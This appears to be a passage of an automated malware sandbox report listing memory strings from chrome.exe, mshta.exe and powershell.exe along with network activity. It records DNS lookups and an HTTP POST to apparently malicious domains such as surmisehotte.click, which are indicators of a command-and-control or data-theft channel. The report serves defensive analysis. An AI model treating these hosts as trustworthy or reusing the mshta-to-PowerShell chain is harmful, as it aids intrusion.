url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2||(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
                    Source: chrome.exe, 00000009.00000003.57225858403.0000781C03780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C02418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2||(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#doodle{position:relative}#shareButton{background-color:var(--color-new-tab-page-doodle-share-button-background,none);border:none;height:32px;min-width:32px;padding:0;position:absolute;width:32px;bottom:0}:host-context([dir=ltr]) #shareButton{right:-40px}:host-context([dir=rtl]) #shareButton{left:-40px}#shareButtonIcon{width:18px;height:18px;margin:7px;vertical-align:bottom;mask-image:url(chro
                    Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                    Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                    Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                    Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                    Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                    Source: chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult equals www.youtube.com (Youtube)
                    Source: chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com:443 equals www.youtube.com (Youtube)
                    Source: global trafficDNS traffic detected: DNS query: savecoupons.shop
                    Source: global trafficDNS traffic detected: DNS query: journal.liveview.pw
                    Source: global trafficDNS traffic detected: DNS query: surmisehotte.click
                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: surmisehotte.click
                    Source: global trafficTCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
                    Source: global trafficTCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
                    Source: global trafficTCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
                    Source: global trafficTCP traffic: 192.168.11.20:61507 -> 239.255.255.250:1900
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096371
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096608
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40096838
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644627
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/40644912
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/41488637
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42261924
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42263580
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264193
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264287
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42264571
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42265509
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266194
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266231
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266232
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/42266842
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clients2.google.com/time/1/current
                    Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
                    Source: chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294691129.0000781C031A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crbug.com/941620
                    Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                    Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                    Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: chrome.exe, 00000009.00000002.57289091865.0000781C02978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285755859.0000781C022DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286086306.0000781C0233C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.chrome.com/docs/extensions/how-to/distribute/install-extensions)
                    Source: chrome.exe, 00000009.00000002.57298031858.0000781C03578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dns-tunnel-check.googlezip.net/connect
                    Source: chrome.exe, 00000009.00000002.57285322841.0000781C0227D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                    Source: powershell.exe, 00000003.00000002.56221594211.000000000583E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                    Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png4
                    Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                    Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                    Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                    Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227105780.0000781C03864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227297827.0000781C03890000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227507330.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57227701272.0000781C038BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                    Source: chrome.exe, 00000009.00000002.57298407737.0000781C03604000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
                    Source: powershell.exe, 00000003.00000002.56217685265.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                    Source: chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
                    Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                    Source: mshta.exe, 00000002.00000003.56246777435.00000000031DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000002.56249723145.00000000031DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56232080477.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000002.00000003.56231710859.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56215345271.0000000000650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57160001365.0000000000880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.57431193652.0000000000629000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                    Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223510159.0000781C02CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;dc_pre=CL6sqZyWpIgDFWU-RAgdUQci9A;src=2542116;type=cli
                    Source: chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Abuse?mkt=EN-US&uiflavor=web&client_id=1E000040382627&id=293577&lmif=40&abr
                    Source: chrome.exe, 00000009.00000002.57285322841.0000781C02254000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                    Source: chrome.exe, 00000009.00000002.57300803464.0000781C039AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57288885941.0000781C02928000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                    Source: chrome.exe, 00000009.00000002.57287094746.0000781C02524000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300803464.0000781C039AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                    Source: chrome.exe, 00000009.00000002.57285582693.0000781C022B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                    Source: chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                    Source: chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                    Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                    Source: chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
                    Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                    Source: powershell.exe, 00000003.00000002.56217685265.00000000047D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.office.com/office/url/setup
                    Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://alldrivers4devices.net/
                    Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/42265720
                    Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                    Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://beastacademy.com/checkout/cart
                    Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/
                    Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300237357.0000781C03824000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
                    Source: chrome.exe, 00000009.00000003.57229158279.0000781C02710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229611994.0000781C039C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229782396.0000781C02804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com
